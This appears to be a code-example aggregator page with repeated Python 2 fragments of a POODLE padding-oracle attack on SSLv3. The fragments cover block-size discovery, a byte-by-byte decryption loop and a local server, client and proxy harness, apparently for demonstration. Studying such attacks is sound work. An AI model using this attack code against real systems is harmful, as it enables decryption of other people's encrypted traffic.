Esempio n. 1
0
 def __init__(self, host, port):
     self.proxy_host = host
     self.proxy_port = port
     self.cookie = "".join(
         random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15)
     )
     print draw("Sending request : ", bold=True, fg_yellow=True)
     print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
Esempio n. 2
0
 def __init__(self, host, port):
     self.proxy_host = host
     self.proxy_port = port
     self.cookie = ''.join(
         random.SystemRandom().choice(string.uppercase + string.digits +
                                      string.lowercase) for _ in xrange(15))
     print draw("Sending request : ", bold=True, fg_yellow=True)
     print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n",
                bold=True,
                fg_yellow=True)
Esempio n. 3
0
 def __init__(self, host, port):
     self.proxy_host = host
     self.proxy_port = port
     self.cookie = ''.join(
         random.SystemRandom().choice(string.uppercase + string.digits +
                                      string.lowercase) for _ in xrange(15))
     print draw("Sending request : ", bold=True, fg_yellow=True)
     print draw(
         "POST / HTTP/1.1\r\nUsername: securityprotocols\r\nAuth-token: SPftwboi\r\nCookie: "
         + self.cookie + "\r\n\r\n",
         bold=True,
         fg_yellow=True)
Esempio n. 4
0
 def run(self):
     self.client_connection()
     self.size_of_block()
     self.start_exploit = True
     # disconnect the client to avoid "connection reset by peer"
     self.client_disconect()
     print "Start decrypting the request..."
     self.exploit()
     print '\n'
     print draw("%r" %(self.request), bold=True, fg_yellow=True)
     print '\n'
     self.client_disconect()
     return
Esempio n. 5
0
 def run(self):
     self.client_connection()
     self.size_of_block()
     self.start_exploit = True
     # disconnect the client to avoid "connection reset by peer"
     self.client_disconect()
     print "Start decrypting the request..."
     self.exploit()
     print '\n'
     print draw("%r" %(self.request), bold=True, fg_yellow=True)
     print '\n'
     self.client_disconect()
     return
Esempio n. 6
0
    def exploit(self):
        # start at block 1, finish at block n-2
        # 0 => IV unknown, n => padding block, n-1 => MAC block
        length_f = self.length_frame
        n = length_f / self.length_block + 1

        print "Found message length: ", length_f + self.length_block, " bytes.", "It has ", n, " blocks"
        print "Provide the starting block and the ending block of the sequence you want me to decipher"
        print draw("FOLLOW THE RULES BELOW!", bold=True, fg_red=True)
        print draw(
            "The parameters take values between block #1 and #n - 2, where n is the number of blocks for the paintext",
            bold=True,
            fg_yellow=True)
        print draw(
            "Block 0 is the IV which is unknown and irelevant. Block n - 1 is the tag used for the HMAC verification,",
            bold=True,
            fg_yellow=True)
        print draw("The end block is greater or equal than the start block",
                   bold=True,
                   fg_yellow=True)

        start_block = -1,
        end_block = -1
        while (start_block <= 0 or start_block >= n - 2):
            start_block = int(raw_input("Start_block: "))
            if (start_block <= 0 or start_block >= n - 2):
                print "You did not provide a start block as in the rule above! Try again."
        while (end_block < start_block or end_block > n - 2):
            end_block = int(raw_input("End_block: "))
            if (end_block < start_block or end_block > n - 2):
                print "You did not provide a end block as in the rule above! Try again."
        i = start_block
        while i <= end_block:
            self.current_block = i
            print '\n'
            print "Starting to get the plaintext from block: ", i
            print '\n'
            for j in range(self.length_block - 1, -1, -1):
                (plain, nb_request) = self.find_plaintext_byte(self.frame, j)
                self.request += plain
                percent = 100.0 * self.byte_decipher / (
                    (end_block - start_block + 1) * self.length_block)
                print draw(
                    "\rProgression %2.0f%% - client's request %4s - byte found: %r"
                    % (percent, nb_request, plain),
                    bold=True,
                    fg_green=True)
            i += 1
        return
Esempio n. 7
0
 def size_of_block(self):
     print "Begins searching the size of a block...\n"
     self.send_request_from_the_client()
     reference_length = self.length_frame
     i = 0
     while True:
         self.send_request_from_the_client(i)
         current_length = self.length_frame
         self.length_block = current_length - reference_length
         if self.length_block != 0:
             self.nb_prefix = i
             print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
             break
         i += 1
     self.decipherable = False
Esempio n. 8
0
 def size_of_block(self):
     print "Begins searching the size of a block...\n"
     self.send_request_from_the_client()
     reference_length = self.length_frame
     i = 0
     while True:
         self.send_request_from_the_client(i)
         current_length = self.length_frame
         self.length_block = current_length - reference_length
         if self.length_block != 0:
             self.nb_prefix = i
             print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
             break
         i += 1
     self.decipherable = False
Esempio n. 9
0
 def run(self):
     self.client_connection()
     self.size_of_block()
     self.start_exploit = True
     # disconnect the client to avoid "connection reset by peer"
     # this can happen on longer periods of inactivity from the attacker while waiting for the result
     self.client_disconect()
     print "Start decrypting the request..."
     self.exploit()
     print '\n'
     print draw("Found plaintext:%r" % (self.request),
                bold=True,
                fg_green=True)
     print '\n'
     self.client_disconect()
     return
Esempio n. 10
0
                                    |   |                                          
                 ^                  |   |                                          
                 |            +-----v---+------+                                   
                 |            |                |                                   
                 --+----------+     Attacker   |                                   
        inject javascript     |                |                                   
                              +----------------+ 

    """

    parser = argparse.ArgumentParser(description='Connection with SSLv3')
    parser.add_argument('host', help='hostname or IP address')
    parser.add_argument('port', type=int, help='TCP port number')
    parser.add_argument('-v', help='debug mode', action="store_true")
    args = parser.parse_args()

    print draw(plan, bold=True, fg_green=True)

    server = Server(args.host, args.port)
    client = Client(args.host, args.port + 1)
    spy = Proxy(args.host, args.port + 1)
    poodle = Poodle(client)

    server.connection()
    spy.connection()

    poodle.run()

    spy.disconnect()
    server.disconnect()